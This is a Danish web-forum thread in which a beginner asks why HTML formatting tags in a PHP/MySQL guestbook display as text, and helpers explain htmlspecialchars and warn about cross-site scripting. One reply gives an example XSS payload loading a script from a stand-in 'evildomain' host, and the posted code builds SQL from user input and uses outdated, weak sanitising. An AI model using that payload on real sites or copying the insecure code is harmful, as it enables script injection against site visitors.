Avatar billede berner5300 Nybegynder
23. maj 2011 - 18:56 Der er 18 kommentarer og
1 løsning

Skrive html tags

Heej alle

Er der nogen der ved hvordan man kan få sin php siden til at skrive med fed, understreget og skrå, altså <b>,<u> og <i>.

Hvordan kan man gøre dette?

Hvis i skal bruge php koden, skriver i det bare :)
Avatar billede pstidsen Novice
23. maj 2011 - 19:01 #1
<b>fed tekst her</b>, <u>understreget tekst her</u> eller hvad er det lige du mener??
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:08 #2
Min php kode ser sådan her ud.

[quote]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/ (...)
<html>
<head>
    <title>Min egen gæstebog!</title>

        <link href="style.css" media="all" rel="stylesheet" type="text/css" />

</head>
<body>
<!-- Vi laver gæstebogen i en fil, dette er det nemmeste. Vi laver 2 link, et til hvor man skrive i gæstebogen, og et til hvor man kan se i gæstebogen. -->
<a href="?valg=skriv">Skriv i gæstebogen</a> - <a href="./">Kig i gæstebogen</a><br><br>
<?php
if($_GET[valg] == "skriv") { // Vi ser om brugeren har trykket på 'skriv i gæstebogen' med 'if'.
?>
<!-- Her laver vi en html form. 'Action' viser hvad der vil bliver vist i URL'en, hvis alt er iorden. -->

<form action="?valg=skrivok" method="POST">
<b>Navn:</b> <br>
<input type="text" name="navn" size="20"><br>
<b>E-mail:</b> <br>
<input type="text" name="email" size="20"><br>
<b>Overskrift:</b> <br>
<input type="text" name="overskrift" size="20"><br>
<b>Besked:</b><br>
<textarea name="besked" rows="7" cols="24"></textarea><br>
<input type="submit" value="Send">
</form>
<?php
} // Vi afslutter '{' ovenfor.
if($_GET[valg] == "skrivok") { // Laver en GET for at se om alt er udfyldt.
    if($_POST[navn] == "") { // Vi ser om der er skrevet i navn.
        echo("Du skal udfylde feltet <b>Navn</b>");
    } else {
        if($_POST[email] == "") { // Vi ser om der er skrevet i email.
            echo("Du skal udfylde feltet <b>E-mail</b>");
        } else {
            if($_POST[overskrift] == "") { // Vi ser om der er skrevet en overskrift.
                echo("Du skal udfylde feltet <b>Overskrift</b>");
            } else {
                if($_POST[besked] == "") { // Vi ser om der er skrevet en besked.
                    echo("Du skal udfylde feltet <b>Besked</b>");
                } else {
                    if(strlen($_POST[besked]) < "10") { // Vi ser om beskeden er over 10 bogstaver.
                        echo("Det var en kort besked");
                    } else {
                        if(is_numeric($_POST[navn])) { // Vi ser om der er skrevet tal i 'Navn'.
                            echo("Jeg har aldrig hørt om tal, i et navn!");
                        } else {
                            $dato = date('d/m/Y - H:i'); // Vi gemmer datoen og klokken i variabel $dato og fremkalder datoen og klokken. 'd' står for dag, 'm' for måned, 'y' for år, 'h' for timer, 'i' for minuter, 's' for sekunder.
                            $ip = $_SERVER[REMOTE_ADDR]; // Vi gemmer '$_SERVER[REMOTE_ADDR]' som variabel '$ip'.
                            $navn = htmlspecialchars($_POST[navn]); // Vi gemmer '$_POST[navn])' som variabel '$navn' og sørge for at brugeren ikke kan bruge html i dette felt.
                            $email = htmlspecialchars($_POST[email]); // Vi gemmer '$_POST[email])' som variabel '$email' og sørge for at brugeren ikke kan bruge html i dette felt.
                            $overskrift = htmlspecialchars($_POST[overskrift]); // Vi gemmer '$_POST[overskrift])' som variabel '$overskrift' og sørge for at brugeren ikke kan bruge html i dette felt.
                            $besked = htmlspecialchars($_POST[besked]); // Vi gemmer '$_POST[beksed])' som variabel '$besked' og sørge for at brugeren ikke kan bruge html i dette felt.
                            if(!get_magic_quotes_gpc()) { // Vi laver en sikkerhed.
                                $navn = addslashes($navn);
                                $email = addslashes($email);
                                $besked = addslashes($besked);
                                $overskrift = addslashes($overskrift);
                            }
                            include("db_connection.php"); // Vi inkludere 'db_connection.php' filen som sørge for der er forbindelse til databasen.
                            mysql_query("INSERT INTO gaestbog (dato, ip, navn, email, besked, overskrift) VALUES ('$dato', '$ip', '$navn', '$email', '$besked', '$overskrift')") or die(mysql_error()); // Vi sætter alle brugerens POSTER ind i databasen.
                            echo("Tak for din besked!");
                        } // Vi afslutter vores is_numeric($_POST[navn]
                    } // Vi afslutter vores strlen($_POST[besked]) < "10")
                } // Vi afslutter vores $_POST[besked]
            } // Vi afslutter vores $_POST[overskrift]
        } // Vi afslutter vores $_POST[email]
    } // Vi afslutter vores $_POST[navn]
} // Vi afslutter vores $_GET
if(!$_GET[valg] == "skrivok") { // Vi ser om vores '$_GET[valg] == "skrivok"' er valgt.
    include("db_connection.php");
    $hent = mysql_query("SELECT * FROM gaestbog ORDER BY id DESC") or die(mysql_error()); // Vi henter alle data ud af mysql databasen
    if(mysql_num_rows($hent)) { // Vi ser om der er noget i mysql databasen
        while($vis = mysql_fetch_array($hent)) { // Vi bruger 'while' for at få alle data ud af mysql, og omdanner dem til fx. $vis[navn]; funktion.
?>
<table border="0" width="100%" class="test" >
    <tr>
        <td>
            <table class="left" border="0" width="100%">
                <tr>
                    <td><h2><? echo $vis[overskrift]; ?></h2></td>
                </tr>
                <tr>
                    <td class="borderstreg">Af <b><a href="mailto:<? echo $vis[email]; ?>"><? echo $vis[navn]; ?></a></b> - <? echo $vis[dato]; ?></td>
                </tr>
                <tr>
                    <td><? echo strip_tags(nl2br($vis[besked]), "<i><u><b><br /><p><a>"); ?></td>
                </tr>
            </table>
        </td>
    </tr>
</table>
<td class="borderstreg"></td>
<?
        }
    } else {
        echo("Der blev intet fundet i databasen.");
    }
?>
</body>
</html>
[/quote]

Hjemmeside: Offlines

Når jeg skriver fx <b> så viser den bare <b>, ikke fed skrift.
Avatar billede pstidsen Novice
23. maj 2011 - 19:22 #3
Skal du ikke have lukket dit doctype tag??
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/ (...)
<html>
??
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:24 #4
Den viser ikke det hele og hvordan laver du en blå boks?
Avatar billede pstidsen Novice
23. maj 2011 - 19:26 #5
kan du så ikke lægge HELE koden herind: www.pastepin.com ??

Skriv (div)tekst het(/div) og skift () ud med []
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:29 #6
Her er koden :)
Avatar billede pstidsen Novice
23. maj 2011 - 19:32 #7
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:34 #8
Hvad er det?
Avatar billede pstidsen Novice
23. maj 2011 - 19:35 #9
tog koden og puttede ind på min side og jeg syens da det ser lidt sjovt ud??
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:37 #10
Du mangler at koble sammen med databasen..

http://www.offlines.dk/123123/
Avatar billede heinzdmx Nybegynder
23. maj 2011 - 19:40 #11
Kigger du på kildekoden på siden kan du se at < bliver encoded til &lt;

Derfor bliver det ikke læst som HTML, men i stedet vises det som tekst.

Det er dine htmlspecialchars kald der gør det, læs kommentaren til hvor der direkte står:
$besked = htmlspecialchars($_POST[besked]); // Vi gemmer '$_POST[beksed])' som variabel '$besked' og sørge for at brugeren ikke kan bruge html i dette felt.
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:42 #12
Hvordan laver man det så man kan gøre det til fed og det ??
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:44 #13
Tak mester. Jeg fandt ud af det. Det var en stor fail af mig :)

Skriv du bare et svar :)
Avatar billede heinzdmx Nybegynder
23. maj 2011 - 19:46 #14
Jeg lægger et svar her :)

Men bemærk at du bør lave en eller anden form for sikkerhed omkring det, specielt <script> tags bør du sørge for ikke indsættes
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:47 #15
Hvilket <script> ??
Avatar billede heinzdmx Nybegynder
23. maj 2011 - 19:52 #16
Hvis brugeren af din gæstebog poster følgende:

<b>Hej, sikke en fed blog <script type="text/javascript" src="evildomain.dk/evilscript.js"></b>

Så vil din kode gøre at det kører.

Det er det der er kendt som XSS, crossside scripting.
Avatar billede berner5300 Nybegynder
23. maj 2011 - 19:54 #17
Altså så du siger at jeg skal lave noget sikkerhed, så man ikke kan poste javascript?? eller hvad?
Avatar billede heinzdmx Nybegynder
23. maj 2011 - 20:02 #18
Ja præcis.

Du bør i stedet bruge:

$besked = strip_tags($_POST[besked], '<i><b>');

Det sørger for at det kun er tilladt at poste <i> og <b> tags og andet ikke er tilladt.

(når du skriver <i> er </i> automatisk også med)
Avatar billede berner5300 Nybegynder
23. maj 2011 - 20:04 #19
Arh. Den havde jeg også skrevet, men det forkerte sted fandt jeg lige her nu. Men du får lige point :)

Mange tak for hjælpen :)